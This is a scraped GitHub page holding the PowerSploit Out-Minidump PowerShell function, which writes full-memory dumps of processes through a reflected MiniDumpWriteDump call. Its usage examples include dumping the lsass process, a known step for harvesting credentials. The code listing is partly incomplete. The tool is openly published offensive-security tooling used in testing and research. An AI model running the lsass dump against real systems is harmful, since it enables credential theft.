Skip to content
This repository has been archived by the owner on Jan 21, 2021. It is now read-only.
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
Cannot retrieve contributors at this time
function Out-Minidump
Generates a full-memory minidump of a process.
PowerSploit Function: Out-Minidump
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
Out-Minidump writes a process dump file with all process memory to disk.
This is similar to running procdump.exe with the '-ma' switch.
Specifies the process for which a dump will be generated. The process object
is obtained with Get-Process.
Specifies the path where dump files will be written. By default, dump files
are written to the current working directory. Dump file names take following
form: processname_id.dmp
Out-Minidump -Process (Get-Process -Id 4293)
Generate a minidump for process ID 4293.
Get-Process lsass | Out-Minidump
Generate a minidump for the lsass process. Note: To dump lsass, you must be
running from an elevated prompt.
Get-Process | Out-Minidump -DumpFilePath C:\temp
Generate a minidump of all running processes and save them to C:\temp.
You can pipe a process object to Out-Minidump.
Param (
[Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True)]
[Parameter(Position = 1)]
[ValidateScript({ Test-Path $_ })]
$DumpFilePath = $PWD
$WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting')
$WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic')
$Flags = [Reflection.BindingFlags] 'NonPublic, Static'
$MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags)
$MiniDumpWithFullMemory = [UInt32] 2
$ProcessId = $Process.Id
$ProcessName = $Process.Name
$ProcessHandle = $Process.Handle
$ProcessFileName = "$($ProcessName)_$($ProcessId).dmp"
$ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName
$FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create)
$Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle,
if (-not $Result)
$Exception = New-Object ComponentModel.Win32Exception
$ExceptionMessage = "$($Exception.Message) ($($ProcessName):$($ProcessId))"
# Remove any partially written dump files. For example, a partial dump will be written
# in the case when 32-bit PowerShell tries to dump a 64-bit process.
Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinue
throw $ExceptionMessage
Get-ChildItem $ProcessDumpPath
END {}